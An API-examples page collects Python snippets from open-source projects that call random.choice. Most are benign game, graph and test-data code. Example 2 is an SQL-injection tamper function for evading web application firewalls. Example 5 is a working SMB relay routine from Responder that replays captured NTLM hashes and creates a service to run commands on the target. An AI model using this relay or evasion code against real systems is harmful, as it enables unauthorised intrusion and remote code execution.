random.choice

Here are the examples of the python api random.choice taken from open source projects. By voting up you can indicate which examples are most useful and appropriate.

200 Examples (page 7)

Example 1

Project: logtacts
Source File: populate_test_data.py
View license
    def handle(self, *args, **options):
        """Populate the given address book with fake tags, contacts,
        contact fields, and log entries for testing."""
        book = Book.objects.get(id=options['book'])
        user = BookOwner.objects.filter(book=book)[0].user
        tags = []
        if options['reset']:
            # Wipe any existing data for this book before regenerating.
            Contact.objects.filter(book=book).delete()
            Tag.objects.filter(book=book).delete()
        for _ in range(10):
            tags.append(Tag.objects.create(
                book=book,
                tag=fake.word(),
                color=fake.safe_hex_color(),
            ))
        # (label, field kind, faker callable) for each field of a contact.
        field_specs = (
            ("Address", contact_settings.FIELD_TYPE_ADDRESS, fake.address),
            ("Company", contact_settings.FIELD_TYPE_TEXT, fake.company),
            ("Email", contact_settings.FIELD_TYPE_EMAIL, fake.email),
            ("Job", contact_settings.FIELD_TYPE_TEXT, fake.job),
            ("Phone", contact_settings.FIELD_TYPE_PHONE, fake.phone_number),
            ("Website", contact_settings.FIELD_TYPE_URL, fake.url),
        )
        for _ in range(40):
            first_tag = random.choice(tags)
            second_tag = random.choice(tags)
            contact = Contact.objects.create(
                book=book,
                name=fake.name(),
            )
            contact.tags.add(first_tag, second_tag)
            contact.save()

            for label, kind, value_factory in field_specs:
                ContactField.objects.create(
                    contact=contact,
                    kind=kind,
                    label=label,
                    value=value_factory(),
                )

            for _ in range(5):
                entry = LogEntry.objects.create(
                    contact=contact,
                    time=fake.date_time_this_year(
                        tzinfo=timezone.get_current_timezone(),
                    ),
                    kind=random.choice(LogEntry.KIND_CHOICES),
                    notes=fake.text(max_nb_chars=42),
                    link=fake.url(),
                    logged_by=user,
                )
                contact.update_last_contact_from_log(entry)

Example 2

Project: raspberry_pwn
Source File: space2mssqlblank.py
View license
def tamper(payload, **kwargs):
    """
    Replaces space character (' ') with a random blank character from a
    valid set of alternate characters

    Requirement:
        * Microsoft SQL Server

    Tested against:
        * Microsoft SQL Server 2000
        * Microsoft SQL Server 2005

    Notes:
        * Useful to bypass several web application firewalls

    >>> random.seed(0)
    >>> tamper('SELECT id FROM users')
    'SELECT%0Eid%0DFROM%07users'
    """

    # ASCII table:
    #   SOH     01      start of heading
    #   STX     02      start of text
    #   ETX     03      end of text
    #   EOT     04      end of transmission
    #   ENQ     05      enquiry
    #   ACK     06      acknowledge
    #   BEL     07      bell
    #   BS      08      backspace
    #   TAB     09      horizontal tab
    #   LF      0A      new line
    #   VT      0B      vertical TAB
    #   FF      0C      new page
    #   CR      0D      carriage return
    #   SO      0E      shift out
    #   SI      0F      shift in
    # %0A (LF) is deliberately last so it can be excluded after a comment
    # marker, where a newline would terminate the comment.
    blanks = ('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A')
    retVal = payload

    if payload:
        retVal = ""
        # Track quoting state (spaces inside quoted strings are kept) and
        # whether a comment terminator ('#' or '-- ') has been seen.
        quote, doublequote, firstspace, end = False, False, False, False

        # FIX: range() instead of the Python-2-only xrange(), which was
        # removed in Python 3; iteration is equivalent on both versions.
        for i in range(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += random.choice(blanks)
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == '#' or payload[i:i + 3] == '-- ':
                end = True

            elif payload[i] == " " and not doublequote and not quote:
                if end:
                    # After a comment marker, exclude %0A (the last entry):
                    # a newline would end the comment.
                    retVal += random.choice(blanks[:-1])
                else:
                    retVal += random.choice(blanks)

                continue

            retVal += payload[i]

    return retVal

Example 3

Project: ngine
Source File: particles.py
View license
    def __init__(self, **args):
        """Create a particle sprite; every attribute can be overridden via
        keyword arguments, otherwise randomized defaults are used."""
        pygame.sprite.Sprite.__init__(self, self.containers)

        factors = [0.2, 0.4, 0.6, 0.8, 1.0]
        self.vx = random.choice(factors)*5
        self.vy = random.choice(factors)*5
        self.ax = random.choice([0, 0.025, 0.05, 0.1])
        self.ay = random.choice([0, 0.025, 0.05, 0.1])
        self.angle = 0
        self.duration = self.lifetime = 255
        self.lifedec = 8
        self.init_color = self.current_color = (255, 255, 255)
        self.end_color = (0, 0, 0)
        self.color_type = 'fixed'
        pos = (0, 0)
        max_size = 3

        # "max_vx"/"max_vy" rescale a fresh random factor; an explicit
        # "vx"/"vy" (handled afterwards) overrides either result.
        if "max_vx" in args:
            self.vx = random.choice(factors)*args["max_vx"]
        if "max_vy" in args:
            self.vy = random.choice(factors)*args["max_vy"]
        self.vx = args.get("vx", self.vx)
        self.vy = args.get("vy", self.vy)
        self.ax = args.get("ax", self.ax)
        self.ay = args.get("ay", self.ay)
        self.angle = args.get("angle", self.angle)
        pos = args.get("pos", pos)
        max_size = args.get("max_size", max_size)
        if "duration" in args:
            self.duration = self.lifetime = args["duration"]
        self.lifedec = args.get("lifedec", self.lifedec)
        if "init_color" in args:
            self.init_color = self.current_color = args["init_color"]
        self.end_color = args.get("end_color", self.end_color)
        self.color_type = args.get("color_type", self.color_type)

        # Explicit size wins; otherwise pick one up to max_size.
        size = args["size"] if "size" in args else random.randint(1, max_size)

        # NOTE(review): '/' left untouched -- this looks like Python 2 era
        # code, where these may be integer divisions; do not "fix" to '//'.
        self.interp_time = self.lifetime/30
        if "interp_time" in args:
            self.interp_time = self.lifetime/args["interp_time"]

        # Per-channel color delta applied while interpolating to end_color.
        self.diffcolor = [
            (self.init_color[c]-self.end_color[c])/self.interp_time
            for c in range(3)
        ]

        self.image = pygame.Surface((size, size))
        self.image.fill(self.init_color)
        self.rect = self.image.get_rect(center=pos)
        self.x, self.y = self.rect.center
        half_w = self.rect.width / 2
        half_h = self.rect.height / 2
        self.radius = math.sqrt(pow(half_w, 2) + pow(half_h, 2))

Example 4

Project: qgisSpaceSyntaxToolkit
Source File: swap.py
View license
def connected_double_edge_swap(G, nswap=1, _window_threshold=3):
    """Attempts the specified number of double-edge swaps in the graph ``G``.

    A double-edge swap removes two randomly chosen edges ``(u, v)`` and ``(x,
    y)`` and creates the new edges ``(u, x)`` and ``(v, y)``::

     u--v            u  v
            becomes  |  |
     x--y            x  y

    If either ``(u, x)`` or ``(v, y)`` already exist, then no swap is performed
    so the actual number of swapped edges is always *at most* ``nswap``.

    Parameters
    ----------
    G : graph
       An undirected graph

    nswap : integer (optional, default=1)
       Number of double-edge swaps to perform

    _window_threshold : integer

       The window size below which connectedness of the graph will be checked
       after each swap.

       The "window" in this function is a dynamically updated integer that
       represents the number of swap attempts to make before checking if the
       graph remains connected. It is an optimization used to decrease the
       running time of the algorithm in exchange for increased complexity of
       implementation.

       If the window size is below this threshold, then the algorithm checks
       after each swap if the graph remains connected by checking if there is a
       path joining the two nodes whose edge was just removed. If the window
       size is above this threshold, then the algorithm performs do all the
       swaps in the window and only then check if the graph is still connected.

    Returns
    -------
    int
       The number of successful swaps

    Raises
    ------

    NetworkXError

       If the input graph is not connected, or if the graph has fewer than four
       nodes.

    Notes
    -----

    The initial graph ``G`` must be connected, and the resulting graph is
    connected. The graph ``G`` is modified in place.

    References
    ----------
    .. [1] C. Gkantsidis and M. Mihail and E. Zegura,
           The Markov chain simulation method for generating connected
           power law random graphs, 2003.
           http://citeseer.ist.psu.edu/gkantsidis03markov.html
    """
    if not nx.is_connected(G):
        raise nx.NetworkXError("Graph not connected")
    if len(G) < 4:
        raise nx.NetworkXError("Graph has less than four nodes.")
    # n counts swap *attempts*; swapcount counts swaps that survived the
    # connectivity checks (this is the returned value; it can go negative
    # transiently while undos are applied).
    n = 0
    swapcount = 0
    # NOTE(review): relies on the pre-2.0 NetworkX API where G.degree()
    # returns a dict -- confirm against the networkx version in use.
    deg = G.degree()
    # Label key for nodes
    dk = list(deg.keys())
    # Cumulative degree distribution: source nodes are sampled proportional
    # to their degree.
    cdf = nx.utils.cumulative_distribution(list(G.degree().values()))
    # Start with the smallest window; it grows on success and shrinks on
    # failure in the adaptive logic below.
    window = 1
    while n < nswap:
        wcount = 0
        swapped = []
        # If the window is small, we just check each time whether the graph is
        # connected by checking if the nodes that were just separated are still
        # connected.
        if window < _window_threshold:
            # This Boolean keeps track of whether there was a failure or not.
            fail = False
            while wcount < window and n < nswap:
                # Pick two random edges without creating the edge list. Choose
                # source nodes from the discrete degree distribution.
                (ui, xi) = nx.utils.discrete_sequence(2, cdistribution=cdf)
                # If the source nodes are the same, skip this pair.
                if ui == xi:
                    continue
                # Convert an index to a node label.
                u = dk[ui]
                x = dk[xi]
                # Choose targets uniformly from neighbors.
                # NOTE(review): random.choice needs a sequence; pre-2.0
                # networkx returns a list from G.neighbors -- verify.
                v = random.choice(G.neighbors(u))
                y = random.choice(G.neighbors(x))
                # If the target nodes are the same, skip this pair.
                if v == y:
                    continue
                if x not in G[u] and y not in G[v]:
                    G.remove_edge(u, v)
                    G.remove_edge(x, y)
                    G.add_edge(u, x)
                    G.add_edge(v, y)
                    swapped.append((u, v, x, y))
                    swapcount += 1
                n += 1
                # If G remains connected...
                if nx.has_path(G, u, v):
                    wcount += 1
                # Otherwise, undo the changes.
                else:
                    G.add_edge(u, v)
                    G.add_edge(x, y)
                    G.remove_edge(u, x)
                    G.remove_edge(v, y)
                    swapcount -= 1
                    fail = True
            # If one of the swaps failed, reduce the window size.
            if fail:
                window = int(math.ceil(window / 2))
            else:
                window += 1
        # If the window is large, then there is a good chance that a bunch of
        # swaps will work. It's quicker to do all those swaps first and then
        # check if the graph remains connected.
        else:
            while wcount < window and n < nswap:
                # Pick two random edges without creating the edge list. Choose
                # source nodes from the discrete degree distribution.
                (ui, xi) = nx.utils.discrete_sequence(2, cdistribution=cdf)
                # If the source nodes are the same, skip this pair.
                if ui == xi:
                    continue
                # Convert an index to a node label.
                u = dk[ui]
                x = dk[xi]
                # Choose targets uniformly from neighbors.
                v = random.choice(G.neighbors(u))
                y = random.choice(G.neighbors(x))
                # If the target nodes are the same, skip this pair.
                if v == y:
                    continue
                if x not in G[u] and y not in G[v]:
                    G.remove_edge(u, v)
                    G.remove_edge(x, y)
                    G.add_edge(u, x)
                    G.add_edge(v, y)
                    swapped.append((u, v, x, y))
                    swapcount += 1
                n += 1
                wcount += 1
            # If the graph remains connected, increase the window size.
            if nx.is_connected(G):
                window += 1
            # Otherwise, undo the changes from the previous window and decrease
            # the window size.
            else:
                while swapped:
                    (u, v, x, y) = swapped.pop()
                    G.add_edge(u, v)
                    G.add_edge(x, y)
                    G.remove_edge(u, x)
                    G.remove_edge(v, y)
                    swapcount -= 1
                window = int(math.ceil(window / 2))
    return swapcount

Example 5

Project: Responder
Source File: SMBRelay.py
View license
def RunRelay(host, Command,Domain):
    """SMB relay attack driver (Python 2 code).

    Negotiates SMB with `host`, relays credentials captured by the rogue
    port-139 server, then walks a chain of DCE/RPC SVCCTL calls (open
    service manager, create service, open service, start service) so that
    a temporary service executes `Command` on the target.

    Each stage checks data[8:10] -- the SMB command byte plus the first
    NT-status byte of the previous reply -- before proceeding.
    """
    Target = host
    CMD = Command
    print "Target is running: ", RunSmbFinger((host, 445))
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((host, 445))
    # SMB Negotiate Protocol request.
    h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x03\xc7",pid="\xff\xfe", tid="\xff\xff")
    n = SMBNego(Data = SMBNegoData())
    n.calculate()
    packet0 = str(h)+str(n)
    buffer0 = longueur(packet0)+packet0
    s.send(buffer0)
    data = s.recv(2048)
    # Extract the NTLM challenge key and the domain/machine name from the
    # negotiate reply; both are relayed to the victim.
    Key = ParseAnswerKey(data,host)
    DomainMachineName = ParseDomain(data)
    if data[8:10] == "\x72\x00":
        # Negotiate succeeded: wait for a victim on the rogue SMB server
        # and relay the captured hashes in a SessionSetupAndX.
        try:
            a = SmbRogueSrv139(Key,Target,DomainMachineName)
            if a is not None:
                LMHash,NTHash,Username,OriginalDomain, CLIENTIP = a
                if Domain is None:
                    Domain = OriginalDomain
                if ReadData("SMBRelay-Session.txt", Target, Username, CMD):
                    pass
                else:
                    head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x03\xc8",pid="\xff\xfe",mid="\x01\x00")
                    t = SMBSessionTreeData(AnsiPasswd=LMHash,UnicodePasswd=NTHash,Username=Username,Domain=Domain,Targ=Target)
                    t.calculate()
                    packet0 = str(head)+str(t)
                    buffer1 = longueur(packet0)+packet0
                    s.send(buffer1)
                    data = s.recv(2048)
        except:
            raise
            # NOTE(review): unreachable after the bare raise above.
            a = None
    if data[8:10] == "\x73\x6d":
        print "[+] Relay failed, auth denied. This user doesn't have an account on this target."
        Logs.info(CLIENTIP+":"+Username)
    if data[8:10] == "\x73\x0d":
        print "[+] Relay failed, SessionSetupAndX returned invalid parameter. It's most likely because both client and server are >=Windows Vista"
        Logs.info(CLIENTIP+":"+Username)
        ## NtCreateAndx
    if data[8:10] == "\x73\x00":
        print "[+] Authenticated, trying to PSexec on target !"
        head = SMBHeader(cmd="\xa2",flag1="\x18", flag2="\x02\x28",mid="\x03\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
        t = SMBNTCreateData()
        t.calculate()
        packet0 = str(head)+str(t)
        buffer1 = longueur(packet0)+packet0
        s.send(buffer1)
        data = s.recv(2048)
        ## Fail Handling.
    if data[8:10] == "\xa2\x22":
        print "[+] Exploit failed, NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation?"
        ## DCE/RPC Write.
    if data[8:10] == "\xa2\x00":
        head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
        x = SMBDCEData()
        x.calculate()
        # FID of the named pipe opened by NtCreate; reused for every
        # subsequent read/write on this connection.
        f = data[42:44]
        t = SMBWriteData(FID=f,Data=x)
        t.calculate()
        packet0 = str(head)+str(t)
        buffer1 = longueur(packet0)+packet0
        s.send(buffer1)
        data = s.recv(2048)
        ## DCE/RPC Read.
        if data[8:10] == "\x2f\x00":
            head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x05\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
            t = SMBReadData(FID=f)
            t.calculate()
            packet0 = str(head)+str(t)
            buffer1 = longueur(packet0)+packet0
            s.send(buffer1)
            data = s.recv(2048)
            ## DCE/RPC SVCCTLOpenManagerW.
            if data[8:10] == "\x2e\x00":
                head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x06\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x03\x00")
                w.calculate()
                x = SMBDCEPacketData(Data=w)
                x.calculate()
                t = SMBWriteData(FID=f,Data=x)
                t.calculate()
                packet0 = str(head)+str(t)
                buffer1 = longueur(packet0)+packet0
                s.send(buffer1)
                data = s.recv(2048)
                ## DCE/RPC Read Answer.
                if data[8:10] == "\x2f\x00":
                    head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x07\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                    t = SMBReadData(FID=f)
                    t.calculate()
                    packet0 = str(head)+str(t)
                    buffer1 = longueur(packet0)+packet0
                    s.send(buffer1)
                    data = s.recv(2048)
                    ## DCE/RPC SVCCTLCreateService.
                    if data[8:10] == "\x2e\x00":
                        # 0x00000005 == ERROR_ACCESS_DENIED in the RPC reply.
                        if data[len(data)-4:] == "\x05\x00\x00\x00":
                            print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?"
                        print "[+] Creating service"
                        head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                        ContextHandler = data[88:108]
                        # Random service/display/file names so repeated runs
                        # don't collide and signatures are harder to match.
                        ServiceNameChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(11)])
                        ServiceIDChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(16)])
                        FileChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(6)])+'.bat'
                        w = SMBDCESVCCTLCreateService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars,DisplayNameID=ServiceIDChars,ReferentID="\x21\x03\x03\x00",BinCMD=CMD)
                        w.calculate()
                        x = SMBDCEPacketData(Opnum="\x0c\x00",Data=w)
                        x.calculate()
                        t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
                        t.calculate()
                        packet0 = str(head)+str(t)
                        buffer1 = longueur(packet0)+packet0
                        s.send(buffer1)
                        data = s.recv(2048)
                        ## DCE/RPC Read Answer.
                        if data[8:10] == "\x2f\x00":
                            head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x09\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                            t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
                            t.calculate()
                            packet0 = str(head)+str(t)
                            buffer1 = longueur(packet0)+packet0
                            s.send(buffer1)
                            data = s.recv(2048)
                            ## DCE/RPC SVCCTLOpenService.
                            if data[8:10] == "\x2e\x00":
                                if data[len(data)-4:] == "\x05\x00\x00\x00":
                                    print "[+] Failed to create the service"

                                head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                                w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars)
                                w.calculate()
                                x = SMBDCEPacketData(Opnum="\x10\x00",Data=w)
                                x.calculate()
                                t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
                                t.calculate()
                                packet0 = str(head)+str(t)
                                buffer1 = longueur(packet0)+packet0
                                s.send(buffer1)
                                data = s.recv(2048)
                                ## DCE/RPC Read Answer.
                                if data[8:10] == "\x2f\x00":
                                    head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                                    t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
                                    t.calculate()
                                    packet0 = str(head)+str(t)
                                    buffer1 = longueur(packet0)+packet0
                                    s.send(buffer1)
                                    data = s.recv(2048)
                                    ## DCE/RPC SVCCTLStartService.
                                    if data[8:10] == "\x2e\x00":
                                        if data[len(data)-4:] == "\x05\x00\x00\x00":
                                            print "[+] Failed to open the service"
                                        # Fresh context handle returned by OpenService.
                                        ContextHandler = data[88:108]
                                        head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                                        w = SMBDCESVCCTLStartService(ContextHandle=ContextHandler)
                                        x = SMBDCEPacketData(Opnum="\x13\x00",Data=w)
                                        x.calculate()
                                        t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
                                        t.calculate()
                                        packet0 = str(head)+str(t)
                                        buffer1 = longueur(packet0)+packet0
                                        s.send(buffer1)
                                        data = s.recv(2048)
                                        ## DCE/RPC Read Answer.
                                        if data[8:10] == "\x2f\x00":
                                            head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
                                            t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
                                            t.calculate()
                                            packet0 = str(head)+str(t)
                                            buffer1 = longueur(packet0)+packet0
                                            s.send(buffer1)
                                            data = s.recv(2048)
                                            if data[8:10] == "\x2e\x00":
                                                print "[+] Command successful !"
                                                Logs.info('Command successful:')
                                                Logs.info(Target+","+Username+','+CMD)
                                                return True
                                            if data[8:10] != "\x2e\x00":
                                                return False
Example 6

Project: LTLMoP
Source File: RRTControllerHandler.py
View license
    def generateNewNode(self,V,V_theta,E,Other,regionPoly,stuck,append_after_latest_node =False):
        """
        Generate a new node on the current tree matrix
        V         : the node matrix
        V_theta   : the orientation matrix
        E         : the tree matrix (or edge matrix)
        Other     : the matrix containing the velocity and angular velocity(omega) information
        regionPoly: the polygon of current region
        stuck     : count on the number of times failed to generate new node
        append_after_latest_node : append new nodes to the latest node (True only if the previous node addition is successful)

        Returns the (possibly extended) V, V_theta, E, Other matrices, the
        updated stuck counter, the append flag for the next call, and a bool
        saying whether a new node was connected to the tree.
        """


        if self.system_print == True:
            print "In control space generating path,stuck = " + str(stuck)

        connection_to_tree = False   # True when connection to the tree is successful

        if stuck > self.stuck_thres:
            # increase the range of omega since path cannot ge generated
            omega = random.choice(self.omega_range_escape)
        else:
            #!!!! CONTROL SPACE STEP 1 - generate random omega
            omega = random.choice(self.omega_range)


        #!!!! CONTROL SPACE STEP 2 - pick a random point on the tree
        # Either extend from the newest node or (with 50% probability) from
        # a uniformly chosen existing node.
        if append_after_latest_node:
            tree_index = shape(V)[1]-1
        else:
            if random.choice([1,2]) == 1:
                tree_index = random.choice(array(V[0])[0])
            else:
                tree_index = shape(V)[1]-1


        # Row 1 of V holds x, row 2 holds y (row 0 is the node index).
        xPrev     = V[1,tree_index]
        yPrev     = V[2,tree_index]
        thetaPrev = V_theta[tree_index]

        j = 1
        #!!!! CONTROL SPACE STEP 3 - Check path of the robot
        # Integrate a unicycle model (constant velocity + omega, dt = 1) for
        # timeStep steps, sweeping a disc of the robot's radius along the way.
        path_robot = PolyShapes.Circle(self.radius,(xPrev,yPrev))
        while j <= self.timeStep:
            xOrg      = xPrev
            yOrg      = yPrev
            xPrev     = xPrev + self.velocity/omega*(sin(omega* 1 + thetaPrev)-sin(thetaPrev))
            yPrev     = yPrev - self.velocity/omega*(cos(omega* 1 + thetaPrev)-cos(thetaPrev))
            thetaPrev = omega* 1 + thetaPrev
            path_robot = path_robot + PolyShapes.Circle(self.radius,(xPrev,yPrev))

            j = j + 1

        thetaPrev = self.orientation_bound(thetaPrev)
        # The swept path must lie entirely inside the current region.
        path_all = PolyUtils.convexHull(path_robot)
        in_bound = regionPoly.covers(path_all)
        """
        # plotting
        if plotting == True:
            self.plotPoly(path_all,'r',1)
        """

        stuck = stuck + 1

        if in_bound:
            robot_new_node = PolyShapes.Circle(self.radius,(xPrev,yPrev))
            # check how many nodes on the tree does the new node overlaps with
            nodes_overlap_count = 0
            for k in range(shape(V)[1]-1):
                robot_old_node = PolyShapes.Circle(self.radius,(V[1,k],V[2,k]))
                if robot_new_node.overlaps(robot_old_node):
                    if  abs(thetaPrev - V_theta[k]) <   self.max_angle_overlap:
                        nodes_overlap_count += 1


            # Accept the node if it is novel, or relax the overlap criterion
            # progressively as the stuck counter climbs.
            if nodes_overlap_count == 0 or (stuck > self.stuck_thres+1 and nodes_overlap_count < 2) or (stuck > self.stuck_thres+500):
                if  stuck > self.stuck_thres+1:
                    append_after_latest_node  = False

                if (stuck > self.stuck_thres+500):
                    stuck = 0
                # Reward a successful connection by reducing the stuck count.
                stuck = stuck - 20
                # plotting
                if self.plotting == True:
                    self.plotPoly(path_all,'b',1)

                if self.system_print == True:
                    print "node connected"

                # Append the new node, its orientation, the edge back to its
                # parent, and the control (velocity, omega) as new columns.
                V = hstack((V,vstack((shape(V)[1],xPrev,yPrev))))
                V_theta = hstack((V_theta,thetaPrev))
                E = hstack((E,vstack((tree_index ,shape(V)[1]-1))))
                Other = hstack((Other,vstack((self.velocity,omega))))
                ##################### E should add omega and velocity
                connection_to_tree = True
                append_after_latest_node  = True
            else:
                append_after_latest_node = False

                if self.system_print == True:
                    print "node not connected. check goal point"

        else:
            append_after_latest_node = False

        return  V,V_theta,E,Other,stuck,append_after_latest_node, connection_to_tree

Example 7

Project: starcheat
Source File: items.py
View license
    def generate_gun(self, item):
        """Assemble a randomly generated gun definition from an item config.

        item[0] is the raw config dict; the result is a dict in the
        "generatedgun" format with randomized parts, projectile stats and
        (when the config provides them) muzzle effects.
        """
        config = item[0]

        # Newer configs carry an explicit image directory list; otherwise
        # derive the folder from the item name.
        if "directories" in config and len(config["directories"]) > 0:
            image_folder = config["directories"][0]
        else:
            image_folder = config["name"].replace(config["rarity"].lower(), "")
            image_folder = image_folder.replace("plasma", "")
            image_folder = "/items/guns/randomgenerated/" + image_folder + "/"

        butts = self.assets.images().filter_images(image_folder + "butt/")
        middles = self.assets.images().filter_images(image_folder + "middle/")
        barrels = self.assets.images().filter_images(image_folder + "barrel/")

        # Pick one random sprite per part; widths position the neighbouring
        # parts in the drawable list.
        butt, butt_width = "", 0.0
        if butts:
            butt = random.choice(butts)[0]
            butt_width = self.assets.images().get_image(butt).size[0]

        middle, middle_width = "", 0.0
        if middles:
            middle = random.choice(middles)[0]
            middle_width = self.assets.images().get_image(middle).size[0]

        barrel = random.choice(barrels)[0] if barrels else ""

        gun = {
            "itemName": "generatedgun",
            "generated": True,
            "maxStack": 1,
            "tooltipKind": "gun",
            "level": 1.0,
            "levelScale": 1.0,
            "projectile": {"level": 1.0, "power": 1.0},
            "projectileCount": random.randint(1, 10),
            "projectileSeparation": random.uniform(0.0, 1.0),
            "drawables": [  # TODO: palettes, some inv icons offset wrong
                {"image": butt, "position": [-(float(butt_width)), 0.0]},
                {"image": middle, "position": [0.0, 0.0]},
                {"image": barrel, "position": [float(middle_width), 0.0]}
            ]
        }

        gun["inventoryIcon"] = gun["drawables"]

        # this is made up, dunno how it really figures it
        if "rateOfFire" in config and len(config["rateOfFire"]) == 2:
            gun["fireTime"] = random.uniform(config["rateOfFire"][0] / 5,
                                             config["rateOfFire"][1] / 5)

        if "multiplier" in config:
            gun["multiplier"] = config["multiplier"]
            gun["classMultiplier"] = config["multiplier"]

        if "handPosition" in config and len(config["handPosition"]) == 2:
            gun["handPosition"] = [-config["handPosition"][0],
                                   -config["handPosition"][1]]

        if ("muzzleFlashes" in config and len(config["muzzleFlashes"]) > 0 and
                "fireSound" in config and len(config["fireSound"]) > 0):
            gun["muzzleEffect"] = {
                "animation": random.choice(config["muzzleFlashes"]),
                "fireSound": [{"file": random.choice(config["fireSound"])}]
            }

        if "projectileTypes" in config and len(config["projectileTypes"]) > 0:
            gun["projectileType"] = random.choice(config["projectileTypes"])

        if "weaponType" in config:
            gun["shortdescription"] = "Cheater's " + config["weaponType"]

        gun["twoHanded"] = ("hands" in config and len(config["hands"]) > 0
                            and config["hands"][0] == 2)

        # Mirror selected config keys straight into the generated item.
        for key in ("baseDps", "directories",
                    "firePosition",  # TODO: not correct
                    "fireSound", "hands", "inaccuracy", "muzzleFlashes",
                    "name", "nameGenerator", "palette", "projectileTypes",
                    "rarity", "rateOfFire", "recoilTime", "weaponType"):
            if key in config:
                gun[key] = config[key]

        return gun

Example 8

Project: starcheat
Source File: items.py
View license
    def generate_sword(self, item):
        """Build a "generatedsword" item dict from a sword template.

        Args:
            item: Sequence whose first element is the template dict ``d``
                (parsed from the game assets) describing the sword family.

        Returns:
            dict: An item dict with randomly chosen handle/blade images,
            primary/alt stances and (optionally) a random swing speed.
        """
        d = item[0]

        # Image folder is the template name with rarity/quality words
        # stripped out, rooted under the random-sword asset path.
        if "rarity" in d:
            image_folder = d["name"].replace(d["rarity"].lower(), "")
        else:
            image_folder = d["name"]
        image_folder = re.sub("(uncommon|common|crappy|new)", "", image_folder)
        image_folder = "/items/swords/randomgenerated/" + image_folder

        handles = self.assets.images().filter_images(image_folder + "/handle/")
        blades = self.assets.images().filter_images(image_folder + "/blade/")

        # Pick a random handle/blade image, or an empty image path when
        # the folder has no candidates.
        if len(handles) > 0:
            handle = random.choice(handles)[0]
        else:
            handle = ""

        if len(blades) > 0:
            blade = random.choice(blades)[0]
        else:
            blade = ""

        sword = {
            "generated": True,
            "itemName": "generatedsword",
            "tooltipKind": "sword",
            "parrySound": "",
            "level": 1,
            # TODO: palette
            "drawables": [{"image": handle},
                          {"image": blade}]
        }

        sword["inventoryIcon"] = sword["drawables"]

        ps = "primaryStances"
        if ps in d:
            sword[ps] = d[ps]
            sword[ps]["projectile"] = {
                "level": 1.0,
                "power": 1.0
            }
            if ("projectileTypes" in d[ps] and
                    len(d[ps]["projectileTypes"]) > 0):
                sword[ps]["projectileType"] = random.choice(d[ps]["projectileTypes"])

        als = "altStances"
        if als in d:
            # NOTE(review): this branch reads sword[ps], so templates with
            # altStances but no primaryStances would raise KeyError here
            # (pre-existing behavior) — confirm templates always have both.
            sword[als] = d[als]
            sword[als]["projectile"] = sword[ps]["projectile"]
            # BUG FIX: original computed len(d[als]["projectileTypes"] > 0),
            # i.e. len() of a bool, which raised TypeError whenever
            # altStances had projectileTypes.  Parenthesis moved so the
            # length is compared to zero, matching the primaryStances case.
            if ("projectileTypes" in d[als] and
                    len(d[als]["projectileTypes"]) > 0):
                sword[als]["projectileType"] = random.choice(d[als]["projectileTypes"])
        else:
            sword[als] = sword[ps]

        # Swing speed is sampled uniformly from the template's range.
        if "rateOfSwing" in d and len(d["rateOfSwing"]) == 2:
            sword["fireTime"] = random.uniform(d["rateOfSwing"][0],
                                               d["rateOfSwing"][1])

        if "rarity" in d:
            sword["rarity"] = d["rarity"]
        else:
            sword["rarity"] = "common"

        if "weaponType" in d:
            sword["shortdescription"] = "Cheater's " + d["weaponType"]

        if "soundEffect" in d and len(d["soundEffect"]) > 0:
            sword["soundEffect"] = {
                "fireSound": [{"file": random.choice(d["soundEffect"])}]
            }

        # Copy selected template keys straight through to the item.
